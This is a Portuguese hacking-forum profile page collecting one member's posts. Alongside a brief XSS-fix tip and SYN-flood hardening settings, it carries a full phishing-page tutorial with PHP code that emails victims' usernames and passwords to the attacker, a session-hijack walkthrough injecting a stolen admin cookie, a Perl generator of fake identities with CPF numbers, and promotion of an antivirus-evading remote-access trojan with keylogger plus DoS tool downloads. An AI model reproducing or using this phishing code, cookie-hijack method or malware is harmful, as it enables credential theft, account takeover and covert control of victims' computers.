Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - samukt

#1
Nesta aula ensino a Corrigir Cross Site Scripting (Xss) com htmlspecialchars() do PHP, é algo bem simples que é pouco divulgado na internet.

YouTube - Broadcast Yourself.

obs: Veja em 720p :D
#2
Um ataque de negação de serviço (também conhecido como DoS, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores. Alvos típicos são servidores web, e o ataque tenta tornar as páginas hospedadas indisponíveis na WWW. Não se trata de uma invasão do sistema, mas sim da sua invalidação por sobrecarga, ou seja ele envia tantos pacotes que o servidor não aguenta mais e cai.

DoS: Basicamente DoS é feito com apenas 1 computador.
DDoS: DDoS é feito com varios computadores zumbis, por isso há mais chaces de um servidor cair.

Atacando:

Neste video demonstro como fazer um ataque DoS:

E nessa o nosso amigo Raul Matheus demonstra Botnets:
Video Aula Udpbot

Proteção:

Configurando IPv4 [Proteção contra SYN Flood]
    Vou ensinar a configurar o IPv4 contra ataques de SYN Flood...
    Para isso vamos editar os arquivos de configuração do IPv4, em /proc/sys/net/ipv4/

    A primeira modificação a ser feita é no arquivo tcp_max_syn_backlog
    ele deve conter um valor alto, pois é o número máximo de conex SYN permitidas. Se esse número for baixo e o timeout da conex for alto certamente vc sofrerá DoS. Um bom valor para ele é 2048

    Vamos alterar também o tcp_synack_retries. Na maioria das distros esse valor eh 5 (que indica que se uma conexão não respondeu com um pacote ACK válido ela eh descartada). Vamos diminuir esse timeout para 3 (que corresponde a 45 segundos).

    No arquivo tcp_syncookies, mude o valor para 1, que significa habilitado. Isso evita que vc sofra ataques com pacotes SYN spoofados, pois eh gerado um cookie baseado no host transmissor e receptor e porta de saida e entrada.

    Essa é apenas a configuração adequada do IPv4 contra SYN flood, várias outras medidas de defesa são possíveis, com boas regras de firewall e IDS.

    Bem pessoal.. isso ai da uma boa segurada, mais dependendo do tamanho do ataque, pode nao funcionar.
    Creditos: Raul_Matheus
#3

1. Faça scans
2. Saiba como Explorar e se Defender de: Fingerprint, Sql Injection Basico, Brute-Force, Php Injection, BackDoor, Local File Disclosure, Cross Site Scripting (xss) e Sql Injection Avançado.

VER E-BOOK


Autor: $4mu:kt
Páginas: 10
#4
Defacement / Re: [Video] Fazendo um ataque DDos
12 de January , 2010, 04:47:26 PM
Quote from: Mago__ on 25 de September , 2009, 09:57:40 AM
3. Acho muito difícil que o site realmente tenha caído. Estes progamas de ataque DoS ou programa de escaneamento como o NMap consomem muito da sua conexão e, algumas vezes, chegam a derrubar sua conexão. É exatamente por isso que o NMap tem a opção -max-rate, para você controlar quantos pacotes podem ser enviados por segundo. O que penso que aconteceu foi sua conexão ter caído. Neste caso você pode reiniciar seu modem e ver se o site realmente caiu ou foi você que caiu.

Abraços

Uma internet de 10 mb??
#5
Amigos, fazer o mesmo tutorial com uma página como o orkut seria Receita de bolo.
O legal é descobrir como se faz  :D ;)
#6
Quem nunca se perguntou o que fazer depois de receber os cookies do Xss?
Aqui vai um Tutorial.


Código da página:

   <?php
    
if ($_COOKIE["21232f297a57a5a743894a0e4a801fc3"] == "1"){
    echo 
"admin";}
    else {
    echo 
"usuario";
    }
    
?>


Nos estamos logados como Usuario comum, depois de fazer o Cross Site Script com o admin, nos retornou o seguinte cookie:



Ao digitar no nosso navegador javascript:alert(document.cookie) aparece uma mensagem em branco:
Ou seja, nosso cookie não tem privilégios, se mudarmos para o do admin então os consiguiremos.

Para injetar o cookie do administrador use o código:

javascript:void(document.cookie= "21232f297a57a5a743894a0e4a801fc3 = 1");

Resultado:
Nosso cookie esta igual o do admin, para o sistema nós somos ele, por isso conseguimos os privilégios.

Para testar esse tutorial use o site: http://ronaldobrilhanocorintia.6te.net/index2.php

Fonte: http://www.inw-seguranca.com
Autor: $4mu:kt
#7
Perl / [Programa] Easy Perl2exe (converta .pl para .exe)
20 de September , 2009, 05:10:08 PM
Muita gente tem dificuldade para usar o perl2exe, com esse programa criado por mim é muito mais facil converter perl para executavel.
O Easy usa Perl2exe mas eu acrescentei um batch para automatizar os códigos.
Download:
http://www.4shared.com/file/134110000/4f626db6/EASY_perl2exe.html
(esse programa é open-source você pode modifica-lo e melhora-lo como quiser).
#8
Já que o meu gerador feito em delphi tava dando alerta de virus ae vai:
#!/usr/bin/perl
#Gerador de Indentidade v 1.5
#By $4mu:kt
#Basiado no cod by Dr4k3
$conta2=1;

system("color 2");
{
print q{
============================================================================
   _________  _______  _____  ____  __________  ______  ____ _____________   
  |         ||       ||     \/    ||    |     ||      |/   /|   ©$4mu:kt  |
  |     ____||  --   ||           ||    |     ||      ____/ |             |
  |         ||       ||    |  |   ||    |     ||           ||___       ___|
  |____     ||  |    ||    |\/|   ||          ||      |    |    |     |
  |         ||  |    ||    |  |   ||          ||      |    |    |     |
  |_________||__|____||____|  |___||__________||______|____|    |_____|
                                                http://www.inw-seguranca.com
============================================================================

};
};
sleep 1;

@caracteres=(
"Rua: Quinze de Novembro, 11 Bairro: Tremembe Cidade: Sao Paulo Estado: SP Cep: 02362-085 Pais: BRASIL Cpf: 140.082.903-89","Avenida: Alm. Barroso, 139 Bairro: Centro Cidade: Rio de Janeiro Estado: RJ Cep: 20031-005 Pais: BRASIL Cpf: 331.892.376-11","Rua: Girassol, 134 Bairro: Pinheiros Cidade: Sao Paulo Estado: SP Cep: 05433-000 Pais: BRASIL Cpf: 180.979.133-21",
);

print "Gerando...";
print "\nGenerating ... \n ";
chomp($carac= 1 );
$p2="";


if ($carac >= 0){
for ($conta=1, $max=$carac; $conta <= $max; $conta++) {
$num = rand(@caracteres);
$p1 = $caracteres[$num];
$p2 = "$p1$p2";
}
push(@senhas,$p2);
sleep 2;
print "\n$p2\n";
}

if ($vezes >= 1) {
$vezes=0;
}
print "\nPressione enter para sair...\n";
print "Press enter to exit... ";
<STDIN>;

Caso você não saiba como codar:
Download Do executavel (.exe)
#9
Defacement / Re: [Video] Fazendo Deface com a c99shell
07 de September , 2009, 03:46:00 PM
My mom do Eminem album Relapse
#10


[size=200]Não Mandem Para o Virustotal ou outro site do genero que ele vai ser descoberto![/size]
Pelo scaner que eu fiz só 6 de 40 av's pegaram!
Funções:

Windows:

* Travar/destravar Windows
* Desligar/Reiniciar
* Ocultar Barra de Tarefas/Normalizar
* Ocultar Botão de iniciar/ Normalizar
* Inicia com o WindowS

Diversos:

* Desligar/Ligar Monitor
* Abrir/Fechar CD
* Ocultar/Mostrar Desktop
* Ocultar/Mostar Relógio
* Inverter/Normalizar Mouse
* Travar/Destravar Mouse

Mensagem:

Mande uma mensagem de erro do windows contendo a suas palavras para a vítima.

Keylogger:

Pegue Tudo o que a vítima escreve em Tempo real (você ve ela escrever).

Configurações:

Crie o Servidor para mandar à vítima e assumir o PC dela.

E tem conexão Reversa, Você recebe o ip da vítima!!

[size=200]Baixa!![/size]
http://www.4shared.com/file/130260565/af6276f9/Invader_Rat_35.html

Nessa versão só mudou o servidor que ficou indetectavel...
Na v 4.0 vou mudar tudo...
#11
Link OFF!
[/b]
#12
Muito bom PARABéns!
#13
Defacement / [Video] Fazendo um ataque DDos
03 de September , 2009, 12:28:00 PM
Arquivos da Aula:
SPRUT:

Senha: www.inw-seguranca.com
Ip Capture:

O Sprut vai dar sinal de virus, mas não se preucupem que não estraga o pc (pelo menos o meu não estrago)
#14
Essa eu sabia, pena que só funciona no windows :(
#15
Tutoriais / [Tutorial] Páginas fake Como Fazer Qualquer Uma!
03 de September , 2009, 12:11:13 PM
1: Entendendo como funciona:
Primeiro crie uma pagina html:
Coloque 2 textfields e um botão escrito enviar enviar

Especifique a página php que vai responder

<form name="form1" method="post" action="oi.php">

agora na textfield especifique como:

User:
              <input name="user" type="text" id="user">Senha
                <input name="senha" type="text" id="senha">

E no botão enviar especifique assim:

<input type="submit" name="Submit" value="Enviar">


Código final:
             
<form name="form1" method="post" action="oi.php">
<input name="user" type="text" id="user">Senha
                <input name="senha" type="text" id="senha">
<input type="submit" name="Submit" value="Enviar">


Agora crie um arquivo php

<?php
//iremos declarar as variaveis que recebemos pelo método post
$user=$_POST[user];
$senha=$_POST[senha];

//agora vamos enviar todos esses dados usando a função mail
mail("seuemail@gmail.com","PAGINA FAKE","
---FAKESÃO v1.0---
____________________________________________
Nome: 
$user
Senha: 
$senha
"
,"FROM:Fakesao<fake@fake.fa.ke>");
echo 
'<meta http-equiv="refresh" content="0; url=http://www.orkut.com.br/Main#Community?rl=cpn&cmm=3726307">'// Redireciona para a pagina vdd(uma comunidade) ;
?>


Salve como oi.php(pois esta declarado lá no primeiro código para ir para essa página)
agora teste
=D

2:Como uso isso em páginas fake?
Todas as páginas tem dois textfield e um botão que envia. Para fazer a sua basta substituir eles pelo processo acima só que sem alterar o visual.